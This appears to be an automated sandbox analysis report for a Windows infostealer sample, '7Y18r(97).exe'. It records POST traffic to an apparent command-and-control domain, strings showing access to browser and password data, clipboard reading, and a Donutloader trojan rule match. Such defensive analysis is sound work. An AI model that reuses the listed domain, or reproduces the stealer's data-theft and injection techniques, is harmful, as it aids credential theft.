            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: closedjuruwk.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1242Host: closedjuruwk.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572697Host: closedjuruwk.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: closedjuruwk.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: closedjuruwk.shop
            Source: 7Y18r(97).exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: 7Y18r(97).exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: 7Y18r(97).exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: 7Y18r(97).exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: 7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: 7Y18r(97).exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
            Source: 7Y18r(97).exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: 7Y18r(97).exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: 7Y18r(97).exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: 7Y18r(97).exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: 7Y18r(97).exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
            Source: 7Y18r(97).exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: 7Y18r(97).exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: 7Y18r(97).exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: 7Y18r(97).exeString found in binary or memory: http://ocsp.digicert.com0C
            Source: 7Y18r(97).exeString found in binary or memory: http://ocsp.digicert.com0X
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: 7Y18r(97).exeString found in binary or memory: http://ocsp.sectigo.com0
            Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: 7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
            Source: 7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000002.1752535595.000000000084C000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000891000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/
            Source: 7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/)
            Source: 7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/M
            Source: 7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/W
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1637171340.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1613541377.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000880000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000002.1755775097.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000002.1752535595.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/api
            Source: 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000002.1752535595.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/api?
            Source: 7Y18r(97).exe, 00000000.00000002.1752535595.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/apiE#
            Source: 7Y18r(97).exe, 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1613541377.00000000008BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/apiew
            Source: 7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/e
            Source: 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000891000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/o
            Source: 7Y18r(97).exe, 00000000.00000003.1659282528.0000000000891000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/tyg
            Source: 7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop/u
            Source: 7Y18r(97).exe, 00000000.00000002.1755775097.00000000033C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop:443/api
            Source: 7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://closedjuruwk.shop:443/apiMicrosoft
            Source: 7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
            Source: 7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
            Source: 7Y18r(97).exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: 7Y18r(97).exeString found in binary or memory: https://sectigo.com/CPS0
            Source: 7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: 7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: 7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
            Source: 7Y18r(97).exe, 00000000.00000003.1625448092.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: 7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: 7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: 7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49717 version: TLS 1.2
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02ADED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,0_2_02ADED00
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02ADED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,0_2_02ADED00

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025BF6A2 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_025BF6A2
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025BF6A20_2_025BF6A2
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025706AD0_2_025706AD
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025AA3DF0_2_025AA3DF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025983EF0_2_025983EF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025700480_2_02570048
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025A51DF0_2_025A51DF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_0258166F0_2_0258166F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025786CF0_2_025786CF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_0257645F0_2_0257645F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_0257A4BF0_2_0257A4BF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02595AF60_2_02595AF6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025AEB6F0_2_025AEB6F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025AE89F0_2_025AE89F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_0257793F0_2_0257793F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_0257592F0_2_0257592F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02576E3F0_2_02576E3F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02589E2A0_2_02589E2A
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025AEE9F0_2_025AEE9F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02597D6F0_2_02597D6F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02578DCF0_2_02578DCF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02593DEF0_2_02593DEF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AD22900_2_02AD2290
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AB52E00_2_02AB52E0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AECD400_2_02AECD40
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AC82CB0_2_02AC82CB
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AD62100_2_02AD6210
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AB72700_2_02AB7270
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AED3400_2_02AED340
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AED0100_2_02AED010
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AE36800_2_02AE3680
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02ABFB100_2_02ABFB10
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AB6B700_2_02AB6B70
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AE88800_2_02AE8880
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AD68900_2_02AD6890
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AB49000_2_02AB4900
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AB89600_2_02AB8960
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AD3F970_2_02AD3F97
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AB5DE00_2_02AB5DE0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AB3DD00_2_02AB3DD0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: String function: 02AB93B0 appears 84 times
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: String function: 025817FF appears 202 times
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: String function: 0257AF0F appears 80 times
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: String function: 02ABFCA0 appears 202 times
            Source: C:\Users\user\Desktop\7Y18r(97).exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 1680
            Source: 7Y18r(97).exeStatic PE information: invalid certificate
            Source: 7Y18r(97).exe, 00000000.00000002.1754067248.0000000002398000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs 7Y18r(97).exe
            Source: 7Y18r(97).exeBinary or memory string: OriginalFileName vs 7Y18r(97).exe
            Source: 7Y18r(97).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02570DBD CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,FindCloseChangeNotification,FindCloseChangeNotification,0_2_02570DBD
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7724
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\66fd0d5f-5a66-4051-855b-af4cb0e3fee0Jump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 7Y18r(97).exe, 00000000.00000003.1600529485.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1600179243.00000000033E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 7Y18r(97).exeString found in binary or memory: /LOADINF="filename"
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile read: C:\Users\user\Desktop\7Y18r(97).exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\7Y18r(97).exe "C:\Users\user\Desktop\7Y18r(97).exe"
            Source: C:\Users\user\Desktop\7Y18r(97).exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 1680
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: 7Y18r(97).exeStatic file information: File size 10906544 > 1048576
            Source: 7Y18r(97).exeStatic PE information: section name: .didata
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025971C2 push ds; retf 0_2_025971C8
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_025C0A31 push edx; ret 0_2_025C0A73
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02597B84 push esi; ret 0_2_02597B97
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AD6025 push esi; ret 0_2_02AD6038
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AD5663 push ds; retf 0_2_02AD5669
            Source: C:\Users\user\Desktop\7Y18r(97).exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
